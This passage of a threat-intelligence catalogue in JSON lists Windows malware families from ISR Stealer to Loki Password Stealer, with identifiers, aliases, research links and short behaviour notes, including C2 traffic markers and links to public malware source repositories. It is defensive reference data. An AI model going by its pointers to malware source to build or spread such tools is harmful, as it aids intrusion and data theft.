It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" - ] - }, - "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", - "value": "IsSpace", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" - ] - }, - "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", - "value": "JackPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", - "http://malware-traffic-analysis.net/2017/05/16/index.html", - "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", - "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" - ] - }, - "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", - "value": "Jaff", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor" - ] - }, - "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9", - "value": "Jager Decryptor", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Reconcyc" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", - "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146", - "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf" - ] - }, - "uuid": 
"0f02ea79-5833-46e0-8458-c4a863a5a112", - "value": "Jaku", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", - "value": "Jasus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw" - ] - }, - "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", - "value": "Jigsaw", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy", - "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" - ] - }, - "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e", - "value": "Jimmy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", - "https://www.us-cert.gov/ncas/alerts/TA18-149A", - "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", - "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" - ] - }, - "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b", - "value": "Joanap", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao", - "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/" - ] - }, - "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6", - "value": "Joao", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob", - "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" - ] - }, - "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", - "value": "Jolob", - 
"description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker", - "http://marcmaiffret.com/vault7/" - ] - }, - "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", - "value": "JQJSNICKER", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot", - "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" - ] - }, - "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", - "value": "JripBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb", - "value": "KAgent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - }, - "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", - "value": "Karagany", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader", - "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", - "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" - ] - }, - "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", - "value": "Kardon Loader", - "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. 
The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius", - "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/", - "https://research.checkpoint.com/banking-trojans-development/" - ] - }, - "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", - "value": "Karius", - "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", - "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" - ] - }, - "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c", - "value": "KasperAgent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", - "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" - ] - }, - "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", - "value": "Kazuar", - "description": "" - }, - { - "meta": { - 
"synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" - ] - }, - "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", - "value": "Kegotip", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", - "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", - "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", - "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", - "https://en.wikipedia.org/wiki/Kelihos_botnet" - ] - }, - "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", - "value": "Kelihos", - "description": "" - }, - { - "meta": { - "synonyms": [ - "TSSL" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", - "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", - "https://citizenlab.ca/2016/11/parliament-keyboy/", - "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" - ] - }, - "uuid": "28c13455-7f95-40a5-9568-1e8732503507", - "value": "KeyBoy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3", - "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", - "https://twitter.com/smoothimpact/status/773631684038107136", - "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/" - ] - }, - "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", - "value": "APT3 Keylogger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", - 
"https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" - ] - }, - "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", - "value": "KEYMARBLE", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", - "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor", - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/" - ] - }, - "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", - "value": "KHRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac", - "https://www.group-ib.com/resources/threat-research/silence.html" - ] - }, - "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493", - "value": "Kikothac", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" - ] - }, - "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", - "value": "KillDisk", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Kasper Internet Non-Security", - "Maple" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", - "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", - "https://github.com/nyx0/KINS", - "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", - "https://www.youtube.com/watch?v=C-dEOt0GzSE" - ] - }, - "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", - "value": "KINS", - "description": "" - }, - { - "meta": { - 
"synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.morphick.com/resources/news/klrd-keylogger" - ] - }, - "uuid": "70459959-5a20-482e-b714-2733f5ff310e", - "value": "KLRD", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", - "https://github.com/zerosum0x0/koadic" - ] - }, - "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", - "value": "Koadic", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt", - "https://twitter.com/struppigel/status/812726545173401600" - ] - }, - "uuid": "f7674d06-450a-4150-9180-afef94cce53c", - "value": "KokoKrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", - "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", - "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html", - "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", - "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant" - ] - }, - "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf", - "value": "Konni", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" - ] - }, - "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", - "value": "KoobFace", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Bisonal" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", - 
"https://securitykitten.github.io/2014/11/25/curious-korlia.html", - "https://camal.coseinc.com/publish/2013Bisonal.pdf", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", - "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf", - "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit" - ] - }, - "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", - "value": "Korlia", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", - "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", - "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", - "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf" - ] - }, - "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", - "value": "Kovter", - "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", - "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/" - ] - }, - "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d", - "value": "KPOT Stealer", - "description": "" - }, - { - "meta": { - "synonyms": [ - "BlackMoon" - ], - "type": [], - "refs": [ - 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", - "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", - "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf", - "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", - "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/" - ] - }, - "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", - "value": "KrBanker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader", - "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework" - ] - }, - "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972", - "value": "KrDownloader", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Osiris" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", - "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", - "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", - "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", - "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", - "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", - "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", - "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", - 
"https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" - ] - }, - "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", - "value": "Kronos", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Barys", - "Gofot", - "Kuaibpy" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" - ] - }, - "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7", - "value": "Kuaibu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" - ] - }, - "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", - "value": "Kuluoz", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", - "value": "Kurton", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", - "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" - ] - }, - "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", - "value": "Kwampirs", - "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", - "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", - "http://adelmas.com/blog/longhorn.php", - "https://www.youtube.com/watch?v=jeLd-gw2bWo" - ] - }, - "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", - "value": "Lambert", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin", - "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" - ] - }, - "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", - "value": "Lamdelin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", - "http://malware-traffic-analysis.net/2017/04/25/index.html", - "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", - "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", - "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/", - "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access" - ] - }, - "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", - "value": "LatentBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus", - "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", - "https://twitter.com/PhysicalDrive0/status/828915536268492800", - "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", - "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html" - ] - }, - "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", - "value": "Lazarus", - 
"description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", - "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", - "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" - ] - }, - "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", - "value": "Laziok", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" - ] - }, - "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", - "value": "Leash", - "description": "" - }, - { - "meta": { - "synonyms": [ - "shoco" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", - "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", - "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html", - "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html" - ] - }, - "uuid": "41da41aa-0729-428a-8b82-636600f8e230", - "value": "Leouncia", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", - "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", - "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/", - "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", - "http://www.malware-traffic-analysis.net/2017/11/02/index.html" - ] - }, - "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", - "value": "Lethic", - "description": "Lethic is a spambot dating back to 2008. 
It is known to be distributing low-level pharmaceutical spam." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail" - ] - }, - "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", - "value": "Limitail", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - }, - "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", - "value": "Listrix", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", - "https://malware.news/t/recent-litehttp-activities-and-iocs/21053", - "https://github.com/zettabithf/LiteHTTP" - ] - }, - "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", - "value": "LiteHTTP", - "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. 
\r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", - "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", - "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", - "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", - "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", - "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", - "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", - "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" - ] - }, - "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", - "value": "Locky", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" - ] - }, - "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", - "value": "Locky (Decryptor)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" - ] - }, - "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", - "value": "Locky Loader", - "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", - "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", - "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", - "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" - ] - }, - "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", - "value": "LockPOS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Nymeria" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", - "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", - "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" - ] - }, - "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", - "value": "Loda", - "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] - }, - "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", - "value": "Logedrut", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", - "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" - ] - }, - "uuid": "2789b246-d762-4d38-8cc8-302293e314da", - "value": "LogPOS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Loki", - "LokiPWS", - "LokiBot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", - "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", - "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", - "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", - "https://github.com/R3MRUM/loki-parse", - "http://www.malware-traffic-analysis.net/2017/06/12/index.html", - "http://blog.fernandodominguez.me/lokis-antis-analysis/", - "https://phishme.com/loki-bot-malware/", - "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", - "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", - "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] - }, - "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", - "value": "Loki Password Stealer (PWS)", - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a 
